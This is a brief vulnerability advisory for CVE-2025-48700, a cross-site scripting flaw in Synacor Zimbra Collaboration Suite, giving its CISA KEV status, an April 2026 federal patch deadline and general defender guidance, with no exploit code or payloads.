CVE-2025-48700: Synacor Zimbra Collaboration Suite (ZCS) Cross-site Scripting Vulnerability
Summary
A cross-site scripting (XSS) vulnerability has been identified in Synacor Zimbra Collaboration Suite (ZCS). This flaw could enable attackers to inject and execute arbitrary JavaScript within a user's session, potentially compromising sensitive information. Federal agencies have a deadline of April 23, 2026, to apply mitigations or discontinue use if patches are unavailable.
IFF Assessment
This vulnerability allows attackers to execute arbitrary code within a user's session, which is a direct threat to the confidentiality and integrity of data.
Severity
The vulnerability allows for cross-site scripting, which can lead to unauthorized access to sensitive information and potentially further compromise of the user's session. The high impact and generally exploitable nature of XSS flaws warrant a significant CVSS score.
CISA KEV: Listed as actively exploited. Federal patch due: April 23, 2026. Known ransomware use: Unknown.
Defender Context
This XSS vulnerability in a widely used collaboration suite requires immediate attention. Defenders should prioritize applying vendor-provided mitigations or patches as soon as they become available. Monitoring for suspicious JavaScript execution within ZCS environments is also crucial.